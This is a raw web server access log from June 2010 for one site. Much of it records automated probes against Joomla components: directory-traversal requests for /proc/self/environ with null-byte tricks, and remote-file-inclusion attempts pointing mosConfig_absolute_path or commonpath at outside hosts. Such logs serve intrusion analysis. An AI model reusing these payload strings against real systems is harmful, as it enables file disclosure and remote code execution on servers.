94.23.31.164 - - [16/Jun/2010:17:00:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:03:58 -0700] "GET /logs/access_100121.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:04:18 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:04:40 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:20 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:51 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:01 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
75.125.153.66 - - [16/Jun/2010:17:07:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:07:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:20 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:20 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:32 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:08:32 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:09:12 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:09:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:09:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:09:48 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:09:58 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:09:48 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:10:22 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:10:32 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:10:23 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:11:10 -0700] "GET /logs/access_091203.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:11:11 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
75.125.153.66 - - [16/Jun/2010:17:11:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:11:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:11:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:11:59 -0700] "GET /logs/access_100408.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:13:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:13:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:12:50 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:16:10 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:16:00 -0700] "GET /logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:16:00 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:16:58 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:16:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:17:17:08 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:17:09 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:16:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:17:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:17:00 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:17:00 -0700] "GET /logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:17:00 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:20:20 -0700] "GET /logs/access_091210.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:20:23 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
94.23.45.80 - - [16/Jun/2010:17:20:31 -0700] "GET /logs/access_100422.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.45.80 - - [16/Jun/2010:17:20:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.45.80 - - [16/Jun/2010:17:20:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:20:30 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:21:17 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:21:18 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
218.146.255.196 - - [16/Jun/2010:17:21:28 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
67.195.111.171 - - [16/Jun/2010:17:25:23 -0700] "GET /logs/access_100415.log HTTP/1.0" 200 513471 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:28:37 -0700] "GET /logs/access_100114.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:28:56 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:30:15 -0700] "GET /logs/access_100408.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:30:29 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:30:24 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
208.80.193.121 - - [16/Jun/2010:17:31:06 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3; yplus 5.1.04b)" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:34:01 -0700] "GET /logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:34:11 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:17:34:01 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.80.193.29 - - [16/Jun/2010:17:34:58 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322; HbTools 4.8.4; yplus 5.5.04b)" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:38:23 -0700] "GET /xmlrpc/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
206.210.68.43 - - [16/Jun/2010:17:38:35 -0700] "GET /logs//?commonpath=http://www.dong69.co.kr/xe/ganyot/id/test.pdf?? HTTP/1.1" 200 5948 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.elfagr.net"
206.210.68.43 - - [16/Jun/2010:17:38:35 -0700] "GET /?commonpath=http://www.dong69.co.kr/xe/ganyot/id/test.pdf?? HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:42:52 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:42:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:42:52 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:43:02 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:42:53 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:43:02 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
82.98.144.13 - - [16/Jun/2010:17:43:06 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
82.98.144.13 - - [16/Jun/2010:17:42:57 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
82.98.144.13 - - [16/Jun/2010:17:42:57 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
207.58.183.16 - - [16/Jun/2010:17:43:00 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
207.58.183.16 - - [16/Jun/2010:17:43:00 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
207.58.183.16 - - [16/Jun/2010:17:43:10 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:43:14 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:43:14 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
207.58.183.16 - - [16/Jun/2010:17:43:14 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
82.98.144.13 - - [16/Jun/2010:17:43:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
213.179.32.13 - - [16/Jun/2010:17:45:37 -0700] "GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:45:51 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:46:01 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:46:01 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:45:56 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:46:06 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:45:57 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:47:25 -0700] "GET /logs/access.log/xmlrpc/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:47:15 -0700] "GET /xmlrpc/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:17:47:16 -0700] "GET /logs/xmlrpc/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:49:03 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:48:54 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:49:05 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:48:56 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:49:07 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.142.138 - - [16/Jun/2010:17:48:59 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:51:17 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:52:19 -0700] "GET /logs/access_091203.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
67.228.62.66 - - [16/Jun/2010:17:52:21 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:17:52:54 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
66.99.17.62 - - [16/Jun/2010:17:52:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
173.160.141.237 - - [16/Jun/2010:17:55:13 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
89.111.176.88 - - [16/Jun/2010:17:55:38 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
173.160.141.237 - - [16/Jun/2010:17:55:44 -0700] "GET /logs/access.log/?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
173.160.141.237 - - [16/Jun/2010:17:55:54 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
173.160.141.237 - - [16/Jun/2010:17:55:44 -0700] "GET /logs/?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
89.111.176.88 - - [16/Jun/2010:17:56:01 -0700] "GET /logs/access.log/?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.111.176.88 - - [16/Jun/2010:17:56:01 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
89.111.176.88 - - [16/Jun/2010:17:56:02 -0700] "GET /logs/?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
213.179.32.13 - - [16/Jun/2010:17:58:49 -0700] "GET /logs/access.log/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
213.179.32.13 - - [16/Jun/2010:17:58:59 -0700] "GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
213.179.32.13 - - [16/Jun/2010:17:58:59 -0700] "GET /logs/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
66.99.17.62 - - [16/Jun/2010:17:59:42 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [16/Jun/2010:17:59:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [16/Jun/2010:17:59:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:03:31 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:03:50 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:06:51 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:06:51 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:06:51 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
